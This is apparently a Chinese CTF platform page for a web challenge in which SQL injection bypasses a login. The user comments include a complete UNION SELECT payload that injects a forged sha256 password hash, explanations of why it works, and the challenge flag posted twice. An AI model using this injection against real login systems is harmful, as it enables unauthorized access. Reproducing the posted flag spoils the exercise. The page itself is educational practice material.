sqli-0x1WEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
Aman
一血奖励:
0金币
解 决:
898
提 示:
描 述:
SQL injections are still a problem yes, even in 2021.
Bypass the login mechanism and get access to the admin area.
评分(16)
解题动态
![](/upload/user/20230203/03be5ed576d50beaf60e66edaf1d3d74.webp)
404无法访问 攻破了该题 43分钟前
![](/static/images/face.webp)
ukdnp 攻破了该题 4小时前
![](/static/images/face.webp)
阿甘先生 攻破了该题 1天前
![](/static/images/face.webp)
fsrm9910 攻破了该题 1天前
![](/static/images/face.webp)
judgen 攻破了该题 1天前
![](/static/images/face.webp)
蒲牢 攻破了该题 1天前
![](/static/images/face.webp)
Garmin 攻破了该题 1天前
![](/static/images/face.webp)
Cynthiazxyy 攻破了该题 1天前
![](/static/images/face.webp)
sugarL 攻破了该题 2天前
![](/static/images/face.webp)
Thomas 攻破了该题 2天前
![](/static/images/face.webp)
xiaosuda 攻破了该题 2天前
![](/static/images/face.webp)
yinbug 攻破了该题 3天前
![](/static/images/face.webp)
744426092 攻破了该题 3天前
![](/static/images/face.webp)
userxin 攻破了该题 3天前
![](/static/images/face.webp)
wangyumin 攻破了该题 3天前
![](/static/images/face.webp)
codehub 攻破了该题 4天前
![](/static/images/face.webp)
llll7 攻破了该题 4天前
![](/static/images/face.webp)
Derezzed 攻破了该题 4天前
![](/static/images/face.webp)
NeilOvO 攻破了该题 4天前
![](/static/images/face.webp)
评论
ukdnp 4小时前
举报
代码审计题,见网页源码的/plz_help。
zeromoment 8天前
举报
f1534392279bddbf9d43dde8701cb5be14b82f76ec6607bf8d6ad557f60f304e$0 不行?
shike 1月前
举报
shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}
xiaodeng 2月前
举报
哪个大佬有密码库
17743520638 4月前
举报
这道题非常有意思
meilanzhuju 5月前
举报
五边形战士
波光摇曳 6月前
举报
shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}
lzq2000 7月前
举报
<?php echo hash(“sha256”, “123”.“456”);?> 得到 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92 123是口令,456是盐
黑化佩琪 4天前
举报
佬,这个属于sql注入哪方面的知识,我之前没听说过你的解法
xzs297995 3月前
举报
@234722457 2a8610aefdd0028c6bf074dd18721c0ef8bc43241cc7a653d7aedf2036bdf6b3$654应该是这个 而且密码是987
在浅水中溺水么? 5月前
举报
@234722457 987654要换成2a8610aefdd0028c6bf074dd18721c0ef8bc43241cc7a653d7aedf2036bdf6b3
234722457 6月前
举报
大佬,不用 123456 用 987654 为什么失败啊
lzq2000 7月前
举报
查询一个不存在的账号,拼接union select,将自定义的密码和盐生成的加密字符串注入,覆盖密码查询结果,使用自定义的密码即可通过密码校验,post发送: user=a'union select 1,'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456'--+&pass=123
lzq2000 2月前
举报
@Am0s 联合查询其实本质就是手工增加了一个结果集,跟从数据库中真正查询出来的结果是一样的效果。这里因为数据库中存储的是加过密的信息,所以我们得构造一下加密结果。
lzq2000 2月前
举报
@2957632449 是的,联合查询其实本质就是手工增加了一个结果集,结果就是对应字段的值!
2957632449 3月前
举报
佬 这边1,'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456' 这一串 会自动新建一个结果集是吗 然后'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456'这边代表的是字段password里的值对吗
TwTsaltfish 5月前
举报
@Am0s 3、源码中验证sha256(明文密码$pass+$result["password"]中$后的字符串【$salt】)=$result["password"]中$前的值
TwTsaltfish 5月前
举报
@Am0s 1、猜测原先就是两个字段、账号密码,正常情况下搜到的就是这两个字段$result["user"],$result["password"];2、查询一个不存在的账号,没有union会是空的,union查询得到的第二个值(这里如果有多个无用字段要测试哪个是密码)会作为$result["password"]进入后面的逻辑;3、源码中验证sha2
Am0s 5月前
举报
大佬能讲解一下原理吗
JJhello 7月前
举报
不太懂,来个大佬讲解一下